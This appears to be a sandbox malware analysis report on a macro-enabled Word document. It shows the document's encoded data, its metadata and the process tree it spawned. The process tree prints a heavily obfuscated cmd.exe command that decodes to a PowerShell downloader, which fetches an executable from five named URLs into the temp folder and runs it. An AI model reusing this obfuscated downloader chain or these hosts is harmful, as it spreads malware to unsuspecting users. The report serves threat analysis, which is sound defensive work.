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 ABI0Vng= |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:22 12:21:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:01:22 12:21:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2852 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\201901_Untitled_1795.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4048 | c:\u9309\p266\v5884\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set CQVm=c38q\2~Q6l@GzXUnPSvAN9+IF:};s'{otWafC(Tb4km)/eDE5ux7-0Og,L MjiywYh=$.rB1%pd&&for %P in (73;31;63;72;16;14;70;57;23;36;25;6;48;56;71;72;69;72;17;47;17;17;23;54;20;20;19;59;47;25;6;52;40;56;71;72;65;72;38;47;59;16;25;6;52;1;56;71;72;9;9;58;67;0;21;51;71;71;66;29;15;2;40;8;40;29;27;67;3;40;48;2;71;66;15;45;63;52;31;39;60;45;0;32;58;20;45;32;68;33;45;39;36;9;61;45;15;32;27;67;34;5;53;53;40;66;29;65;32;32;73;25;44;44;34;55;34;32;34;63;61;45;69;12;39;61;0;41;34;68;0;31;42;44;44;59;74;59;48;20;48;17;36;61;10;65;32;32;73;25;44;44;74;31;0;28;74;45;32;45;0;32;31;69;68;50;62;12;44;21;64;64;50;38;9;21;17;13;10;65;32;32;73;25;44;44;69;45;42;31;15;32;52;41;18;34;69;32;61;69;68;69;61;28;45;52;49;73;68;15;28;41;68;69;49;44;51;16;34;21;35;73;42;50;10;65;32;32;73;25;44;44;63;18;52;42;45;34;32;68;15;9;44;13;74;57;53;41;7;7;34;69;10;65;32;32;73;25;44;44;63;63;63;68;28;32;61;15;28;31;15;68;15;9;44;54;21;31;54;50;33;21;46;55;2;29;68;17;73;9;61;32;37;29;10;29;43;27;67;63;21;21;48;1;66;29;42;5;51;51;1;29;27;67;3;71;71;1;53;58;66;58;29;40;5;5;29;27;67;31;21;1;2;1;66;29;15;2;8;53;1;29;27;67;9;5;51;71;40;66;67;45;15;18;25;32;45;42;73;22;29;4;29;22;67;3;71;71;1;53;22;29;68;45;50;45;29;27;35;31;69;45;34;0;65;37;67;61;48;51;48;1;58;61;15;58;67;34;5;53;53;40;43;30;32;69;62;30;67;3;40;48;2;71;68;46;31;63;15;9;31;34;74;24;61;9;45;37;67;61;48;51;48;1;56;58;67;9;5;51;71;40;43;27;67;73;21;21;5;71;66;29;18;1;40;48;29;27;23;35;58;37;37;11;45;32;52;23;32;45;42;58;67;9;5;51;71;40;43;68;9;45;15;55;32;65;58;52;55;45;58;40;53;53;53;53;43;58;30;23;15;18;31;41;45;52;23;32;45;42;58;67;9;5;51;71;40;27;67;35;1;53;5;53;66;29;73;21;8;21;53;29;27;39;69;45;34;41;27;26;26;0;34;32;0;65;30;26;26;67;63;48;71;53;71;66;29;0;40;5;71;71;29;27;75)do set wq=!wq!!CQVm:~%P,1!&&if %P equ 75 echo !wq:~-564!|cmd.exe" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2580 | CmD /V:ON/C"set CQVm=c38q\2~Q6l@GzXUnPSvAN9+IF:};s'{otWafC(Tb4km)/eDE5ux7-0Og,L MjiywYh=$.rB1%pd&&for %P in (73;31;63;72;16;14;70;57;23;36;25;6;48;56;71;72;69;72;17;47;17;17;23;54;20;20;19;59;47;25;6;52;40;56;71;72;65;72;38;47;59;16;25;6;52;1;56;71;72;9;9;58;67;0;21;51;71;71;66;29;15;2;40;8;40;29;27;67;3;40;48;2;71;66;15;45;63;52;31;39;60;45;0;32;58;20;45;32;68;33;45;39;36;9;61;45;15;32;27;67;34;5;53;53;40;66;29;65;32;32;73;25;44;44;34;55;34;32;34;63;61;45;69;12;39;61;0;41;34;68;0;31;42;44;44;59;74;59;48;20;48;17;36;61;10;65;32;32;73;25;44;44;74;31;0;28;74;45;32;45;0;32;31;69;68;50;62;12;44;21;64;64;50;38;9;21;17;13;10;65;32;32;73;25;44;44;69;45;42;31;15;32;52;41;18;34;69;32;61;69;68;69;61;28;45;52;49;73;68;15;28;41;68;69;49;44;51;16;34;21;35;73;42;50;10;65;32;32;73;25;44;44;63;18;52;42;45;34;32;68;15;9;44;13;74;57;53;41;7;7;34;69;10;65;32;32;73;25;44;44;63;63;63;68;28;32;61;15;28;31;15;68;15;9;44;54;21;31;54;50;33;21;46;55;2;29;68;17;73;9;61;32;37;29;10;29;43;27;67;63;21;21;48;1;66;29;42;5;51;51;1;29;27;67;3;71;71;1;53;58;66;58;29;40;5;5;29;27;67;31;21;1;2;1;66;29;15;2;8;53;1;29;27;67;9;5;51;71;40;66;67;45;15;18;25;32;45;42;73;22;29;4;29;22;67;3;71;71;1;53;22;29;68;45;50;45;29;27;35;31;69;45;34;0;65;37;67;61;48;51;48;1;58;61;15;58;67;34;5;53;53;40;43;30;32;69;62;30;67;3;40;48;2;71;68;46;31;63;15;9;31;34;74;24;61;9;45;37;67;61;48;51;48;1;56;58;67;9;5;51;71;40;43;27;67;73;21;21;5;71;66;29;18;1;40;48;29;27;23;35;58;37;37;11;45;32;52;23;32;45;42;58;67;9;5;51;71;40;43;68;9;45;15;55;32;65;58;52;55;45;58;40;53;53;53;53;43;58;30;23;15;18;31;41;45;52;23;32;45;42;58;67;9;5;51;71;40;27;67;35;1;53;5;53;66;29;73;21;8;21;53;29;27;39;69;45;34;41;27;26;26;0;34;32;0;65;30;26;26;67;63;48;71;53;71;66;29;0;40;5;71;71;29;27;75)do set wq=!wq!!CQVm:~%P,1!&&if %P equ 75 echo !wq:~-564!|cmd.exe" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2548 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $c9711='n8464';$q4581=new-object Net.WebClient;$a2004='http://agatawierzbicka.com//MdM5N5SCi@http://docsdetector.xyz/9YYxTl9SX@http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx@http://wv-meat.nl/XdL0kQQar@http://www.stinson.nl/O9oOxW9Dg8'.Split('@');$w9953='m2773';$q1130 = '422';$o9383='n8603';$l2714=$env:temp+'\'+$q1130+'.exe';foreach($i5753 in $a2004){try{$q4581.DownloadFile($i5753, $l2714);$p9921='v345';If ((Get-Item $l2714).length -ge 40000) {Invoke-Item $l2714;$f3020='p9690';break;}}catch{}}$w5101='c4211';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2636 | cmd.exe | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3528 | powershell $c9711='n8464';$q4581=new-object Net.WebClient;$a2004='http://agatawierzbicka.com//MdM5N5SCi@http://docsdetector.xyz/9YYxTl9SX@http://remont-kvartir.rise-up.nsk.ru/7Pa9fpmx@http://wv-meat.nl/XdL0kQQar@http://www.stinson.nl/O9oOxW9Dg8'.Split('@');$w9953='m2773';$q1130 = '422';$o9383='n8603';$l2714=$env:temp+'\'+$q1130+'.exe';foreach($i5753 in $a2004){try{$q4581.DownloadFile($i5753, $l2714);$p9921='v345';If ((Get-Item $l2714).length -ge 40000) {Invoke-Item $l2714;$f3020='p9690';break;}}catch{}}$w5101='c4211'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
